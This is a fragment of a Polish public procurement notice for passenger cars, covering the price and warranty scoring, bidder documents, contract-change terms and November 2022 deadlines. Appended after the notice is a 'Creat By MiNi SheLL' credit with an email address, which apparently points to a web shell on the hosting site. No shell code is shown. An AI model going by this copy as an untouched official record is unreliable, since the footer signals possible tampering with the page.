przedmiotu zamówienia wskazane zostały znaki towarowe, patenty, pochodzenie, normy, aprobaty,<br/>specyfikacje techniczne i systemy referencji technicznych Zamawiający dopuszcza rozwiązania równoważne.<br/>Równoważność polega na możliwości zaoferowania przedmiotu zamówienia o nie gorszych parametrach technicznych,<br/>konfiguracjach, wymaganiach normatywnych itp.<br/>7) Szczegółowy zakres obowiązków stron zawarty jest we wzorze umowy stanowiącym załącznik nr 3 (A lub B) do SWZ.<br/>8) Wykonawca na dostarczony przedmiot zamówienia udziela Zamawiającemu następujących gwarancji jakości<br/>a) minimum 24 miesiące gwarancji ogólnej na samochód, w tym na silnik i wszystkie podzespoły mechaniczne (m.in.<br/>zawieszenie) bez limitu kilometrów (zgodnie ze złożoną ofertą)<br/>Gwarancja w powyższym zakresie stanowi kryterium oceny ofert. Liczona od daty podpisania protokołu zdawczo-odbiorczego przez Zamawiającego.<br/>Zakres gwarancji, uprawnienia zamawiającego oraz obowiązki gwaranta określono we wzorze umowy stanowiącym<br/>załącznik nr 3 (A lub B) do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34110000-1 - Samochody osobowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający, przy wyborze oferty najkorzystniejszej, zastosuje kryterium:<br/>1) Cena [C] 60% =60 pkt.<br/>2) Gwarancja [G] 40%= 40 pkt.<br/>2. Sposób obliczania punktów dla kryterium ceny :<br/>Poszczególny ofertom zostaną przyznane punkty za cenę obliczone wg poniższego wzoru:<br/>Cena oferty- max 60 pkt<br/>C = cena brutto oferty z najniższą ceną/ cena brutto oferty badanej<br/>x 60 pkt<br/>Sposób obliczania punktów dla kryterium gwarancja:<br/>Wykonawca na dostarczony przedmiot zamówienia udziela Zamawiającemu gwarancji jakości ogólnej na samochód, w tym na silnik i<br/>wszystkie podzespoły mechaniczne (m.in. zawieszenie) bez limitu kilometrów. Poszczególnym ofertom zostaną przyznane punkty za<br/>długość okresu gwarancji z zastrzeżeniem że okres gwarancji nie może być krótszy niż 24 miesiące. Jeżeli Wykonawca wskaże<br/>okres gwarancji krótszy niż 24 miesiące, to jego oferta będzie podlegać odrzuceniu. Jeżeli Wykonawca nie wpisze okresu gwarancji<br/>to będzie to również równoznaczne z zaoferowaniem minimalnego okresu gwarancji, tj. 24 miesiące i w takiej sytuacji Wykonawca<br/>nie otrzyma punktów w opisanym kryterium. W zawartej umowie zostanie wpisany okres gwarancji na podstawie informacji uzyskanych z formularza ofertowego.<br/>Punkty zostaną przyznane wg poniższego schematu:<br/> 24 miesiące-35 miesięcy 0 pkt<br/> 36 miesięcy-47 miesięcy 20 pkt<br/> 48-60 miesięcy 40 pkt<br/>Punkty zostaną przyznane na podstawie informacji zawartych w formularzu ofertowym. Kryterium gwarancja oceniany będzie na<br/>podstawie zadeklarowanego przez Wykonawcę okresu gwarancji (wyrażonego w pełnych miesiącach).<br/>Ostateczna ilość punktów dla każdej z ofert zostanie obliczona wg następującego wzoru:<br/>Łączna ilość punktów = C+G</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie dotyczy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga złożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>W zakresie części I:<br/>1) specyfikację techniczną przedmiotu zamówienia opartą na Opisie przedmiotu zamówienia stanowiącym załącznik nr 1A<br/>do SWZ. Wykonawca zobowiązany jest wypełnić w/w załącznik poprzez podanie m.in. szczegółowych parametrów<br/>zaoferowanego przedmiotu zamówienia (odnoszących się do wymagań Zamawiającego) w kolumnie PARAMETRY<br/>OFEROWANE PRZEZ WYKONAWCĘ.<br/>Uwaga:<br/>Jeżeli w Opisie przedmiotu zamówienia Zamawiający podaje wartości minimalne, maksymalne lub zakres, Wykonawca jest<br/>zobowiązany podać konkretne wartości oferowanego przedmiotu zamówienia. Zamawiający nie dopuszcza wpisania tylko<br/>wyrazu „TAK” lub nieokreślenia jednoznacznych, konkretnych parametrów.<br/>Zamawiający przewiduje jednokrotne wezwanie do złożenia lub uzupełnienia przedmiotowych środków dowodowych w<br/>wyznaczonym terminie, jeżeli wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe<br/>środki dowodowe są niekompletne. Uzupełnieniu będzie podlegać specyfikacja techniczna (załącznik nr 1A do SWZ).<br/>Wezwanie nie ma zastosowania jeżeli, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu<br/>albo zachodzą przesłanki unieważnienia postępowania.<br/>Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych<br/>W zakresie części II:<br/>1) specyfikację techniczną przedmiotu zamówienia opartą na Opisie przedmiotu zamówienia stanowiącym załącznik nr 1B<br/>do SWZ. Wykonawca zobowiązany jest wypełnić w/w załącznik poprzez podanie m.in. szczegółowych parametrów<br/>zaoferowanego przedmiotu zamówienia (odnoszących się do wymagań Zamawiającego) w kolumnie PARAMETRY<br/>OFEROWANE PRZEZ WYKONAWCĘ.<br/>Uwaga:<br/>Jeżeli w Opisie przedmiotu zamówienia Zamawiający podaje wartości minimalne, maksymalne lub zakres, Wykonawca jest<br/>zobowiązany podać konkretne wartości oferowanego przedmiotu zamówienia. Zamawiający nie dopuszcza wpisania tylko<br/>wyrazu „TAK” lub nieokreślenia jednoznacznych, konkretnych parametrów.<br/>(odnoszących się do wymagań Zamawiającego) w kolumnie PARAMETRY OFEROWANE PRZEZ WYKONAWCĘ.<br/>Uwaga:<br/>Jeżeli w Opisie przedmiotu zamówienia Zamawiający podaje wartości minimalne, maksymalne lub zakres, Wykonawca jest<br/>zobowiązany podać konkretne wartości oferowanego przedmiotu zamówienia. Zamawiający nie dopuszcza wpisania tylko wyrazu „TAK” lub nieokreślenia jednoznacznych, konkretnych parametrów.<br/>Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W każdej części Zamawiający przewiduje jednokrotne wezwanie do złożenia lub uzupełnienia przedmiotowych środków<br/>dowodowych w wyznaczonym terminie, jeżeli wykonawca nie złożył przedmiotowych środków dowodowych lub złożone<br/>przedmiotowe środki dowodowe są niekompletne. Uzupełnieniu będzie podlegać specyfikacja techniczna (odpowiednio<br/>załącznik nr 1A lub nr 1B do SWZ). Wezwanie nie ma zastosowania jeżeli, pomimo złożenia przedmiotowego środka<br/>dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania.<br/>Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Składana oferta powinna zawierać:<br/>1) formularz Oferty -wg załącznika nr 2 do niniejszej SWZ;<br/>2) specyfikację techniczną przedmiotu zamówienia opartą na Opisie przedmiotu zamówienia stanowiącym załącznik nr 1A<br/>lub załącznik nr 1B do SWZ (wykonawca składa specyfikację techniczną adekwatną do części na którą składana jest oferta);<br/>2) oświadczenie o braku podstaw do wykluczenia -wg załącznika nr 4 do SWZ;<br/>Uwaga! wymóg złożenia oświadczeń dotyczy także Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3) pełnomocnictwo(a) –w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z dokumentu<br/>rejestracyjnego– załącznik Wykonawcy;<br/>4) dokument ustanawiający Pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia publicznego w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia –<br/>załącznik wykonawcy<br/>5) oświadczenie, o którym mowa w art. 117 ust.4 ustawy Pzp, z którego będzie wynikać, które dostawy wykonają poszczególni wykonawcy w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia – wzór oświadczenia stanowi załącznik nr 5 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W każdej części wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>W takim przypadku w danej części wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty. Umocowanie Pełnomocnika musi wynikać z treści pełnomocnictwa przedłożonego wraz z ofertą. Pełnomocnictwo powinno jednoznacznie określać postępowanie i precyzować zakres umocowania, powinno też wymieniać wszystkich Wykonawców, którzy wspólnie ubiegają się o zamówienie. Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (t. j. w formie elektronicznej lub postaci elektronicznej opatrzonej kwalifikowalnym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym). W przypadku gdy pełnomocnictwo zostało sporządzone w postaci papierowej i opatrzone własnoręcznym podpisem przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone podpisem kwalifikowalnym, podpisem zaufanym lub podpisem osobistym osób udzielających pełnomocnictwa. Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>2) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, oświadczenie o których mowa w art. 125 ust. 1 ustawy pzp składa każdy z wykonawców. <br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonują poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 3. Zamawiający, poza przypadkami określonymi w art. 455 ustawy pzp, dopuszcza możliwość zmian umowy w zakresie<br/>dotyczącym:<br/>1) parametrów technicznych i jakościowych oraz ilościowych przedmiotu umowy – w sytuacji wystąpienia siły wyższej<br/>uniemożliwiającej wykonywanie przedmiotu umowy zgodnie z postanowieniami umowy;<br/>2) dostępności przedmiotu umowy lub jego części na rynku spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku,<br/>o ile Wykonawca dochował należytej staranności, w ich pozyskaniu. W takim przypadku Wykonawca może dostarczyć<br/>przedmiot umowy który spełnia wymogi opisane w SWZ i załącznikach pod warunkiem wykazania przez wykonawcę<br/>zgodności przedmiotu zamówienia z wymogami zamawiającego oraz przedstawienia dla zastępczego przedmiotu umowy<br/>lub części wszystkich dokumentów wymaganych w postępowaniu o udzieleniu zamówienia publicznego i niniejszej umowie.<br/>3) pojawienie się na rynku części, materiałów nowszej generacji, pozwalających na zaoszczędzenie czasu i kosztów<br/>realizacji przedmiotu zamówienia lub czasu i kosztów eksploatacji przedmiotu zamówienia na którą wyraził zgodę<br/>Zamawiający,<br/>4) w zakresie terminu wykonania przedmiotu umowy w następujących sytuacjach:<br/>a) w sytuacji wystąpienia przyczyn, z powodu których niemożliwe będzie wykonywanie przez Wykonawcę jego zobowiązań<br/>w następstwie okoliczności, za które odpowiedzialność ponosi Zamawiający;<br/>b) w sytuacji wystąpienia siły wyższej uniemożliwiającej wykonywanie przedmiotu umowy zgodnie z postanowieniami<br/>umowy;<br/>c) będących wynikiem zmiany obowiązujących przepisów,<br/>5) w zakresie zmiany obowiązującej stawki podatku od towarów i usług (VAT) – w takim przypadku, zmianie ulega cena<br/>jednostkowa brutto asortymentu objętego przedmiotem umowy, a cena jednostkowa netto pozostaje bez zmian (Wykonawca<br/>zobowiązany jest poinformować Zamawiającego o zmianach stawek podatku VAT w terminie nie dłuższym, niż trzy (3) dni<br/>od daty opublikowania właściwego aktu prawnego). Zmiany ta obowiązuje od daty wejścia w życie właściwych aktów<br/>prawnych, pod warunkiem dopełnienia przez Wykonawcę obowiązku informacyjnego.<br/>6) Zamawiający przewiduje możliwość zmiany umowy, w przypadku zaistnienia siły wyższej (powódź, pożar, zamieszki,<br/>strajki, ataki terrorystyczne,) mającej wpływ na realizację umowy.<br/>4. Przedłużenie terminu wykonania umowy nie daje Wykonawcy prawa do dodatkowego wynagrodzenia.<br/>5. Wszystkie powyższe zmiany są zmianami, na które Zamawiający może ale nie musi wyrazić zgody. Wykonawcy nie przysługuje żadne roszczenie w tym zakresie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-23 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem Platformy dostępnej pod adresem: https://piwlublin.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-23 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com